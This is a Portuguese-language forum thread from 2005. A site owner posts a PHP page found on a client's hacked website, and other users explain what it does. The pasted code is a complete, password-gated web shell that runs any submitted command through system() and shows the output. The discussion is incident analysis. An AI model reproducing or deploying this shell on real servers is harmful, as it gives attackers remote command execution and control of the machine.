Milena Postado Setembro 19, 2005 Denunciar Share Postado Setembro 19, 2005 Olá a hp de um cliente meu foi hackeado, e econtei uma página em php lá, mas a pergunta é... essa página pode ter feito alguma dano, já que o sevirdo onde esta hospedada a página é asp????o códiga da página q encontrei: <? $cmd = $_POST['cmd']; // $output = system($cmd); $x = $_GET['team']; if ($x != "freshmaker") { die("200 OK"); } if (!$cmd) { echo " <form action='$PHP_SELF?team=freshmaker' method=post> <input type=hidden name=team value=freshmaker> <input type=text name=cmd value=\"$cmd\" size=100> </form>"; } else { echo " <form action='$PHP_SELF?team=freshmaker' method=post> <input type=hidden name=team value=freshmaker> <input type=text name=cmd value=\"$cmd\" size=100> </form>"; echo "<TEXTAREA COLS='100' ROWS='30' STYLE='font-family: verdana; font-size: 12px;'>"; // outputing ob_start( ); system("$cmd"); $output = ob_get_contents(); ob_end_clean( ); // echo $output; if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); echo "\n\n\nFreshmaker Crew"; // outputing echo "</TEXTAREA>"; } ?> Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 BEOC Postado Setembro 20, 2005 Denunciar Share Postado Setembro 20, 2005 Esta página pode danificar teu sistema inteiro cara, e tua hp também.falou'ss Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 marcelo Postado Setembro 20, 2005 Denunciar Share Postado Setembro 20, 2005 Queria tirar uma duvida aproveitando o encejo .. o que seria $PHP_SELF; Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Milena Postado Setembro 20, 2005 Autor Denunciar Share Postado Setembro 20, 2005 Mas de modo geral o que essa página pode fazer?roubar senhas ?deletar arquivos?é que infelizmente não entendo nada de php... mas garanto a vocês ... depois disso .. com certeza vou aprender . Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 ffiction Postado Setembro 20, 2005 Denunciar Share Postado Setembro 20, 2005 BEOC... o que essa pagina pode fazer?? nada... ela nada faz alem de excrever um form na pagina... e considerando que seaj um server em asp se não ouver nenhum webservice que seja em xml ela num faz nada.. perde tottal "poder" certo??? comenta esse codigo que tem coisas que num sei pra que servem ali.. tipo essa parte system("$cmd"); $output = ob_get_contents(); ob_end_clean( ); falows... Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 felipefrancesco Postado Setembro 21, 2005 Denunciar Share Postado Setembro 21, 2005 é...hehehe....nesse código, o sistema vai executar um comando no sistema operacional, com o que o usuário escrever no campo text, escrevendo o resultado no textarea. Se realmente não tem servidor de PHP instalado tudo bem. Agora, se tiver, se o servidor não tiver com algum meio de segurança pra impedir que o script execute comandos no SO, então o cara pode obter controle da máquina. A página vai virar um verdadeiro terminal, como se ele estivesse no servidor. Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Milena Postado Setembro 21, 2005 Autor Denunciar Share Postado Setembro 21, 2005 Valeu pelas explicações . Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Guest - wilson - Postado Setembro 23, 2005 Denunciar Share Postado Setembro 23, 2005 $cmd = $_POST['cmd'];system("$cmd");tudo é relativo ao que entendi a página geraria um form com um text area...Provavelmente eles usariam um outro form com o metodo POST para chamar esta página, o que gravaria na váriavel o campo CMD algum programa .exeposteriormente eles mandam executar o comando SYSTEM que chama um programa externo .exe com o valor sugerido na variavel CMD...vide comando system, também não o conhecia, http://br2.php.net/manual/pt_BR/function.system.php---os efeitos dependeria do que esse exe poderia fazer...porém se é um server ASP o codigo não rodaria não... ao que sei mesmo que se estivesse num servidor windows rodando asp e php ao mesmo tempo (rodando em portas diferentes) cada webserver tem seu diretório WWW o que implicaria no caso do fulano querer rodar o código php dentro do sistema asp pois o código precisa ser interpretado para funcionar...se falei besteira por favor me corrijam, Citar Link para o comentário Compartilhar em outros sites More sharing options...
Pergunta
Milena
Olá a hp de um cliente meu foi hackeado, e econtei uma página em php lá, mas a pergunta é... essa página pode ter feito alguma dano, já que o sevirdo onde esta hospedada a página é asp????
o códiga da página q encontrei:
Link para o comentário
Compartilhar em outros sites
7 respostass a esta questão
Posts Recomendados
Participe da discussão
Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.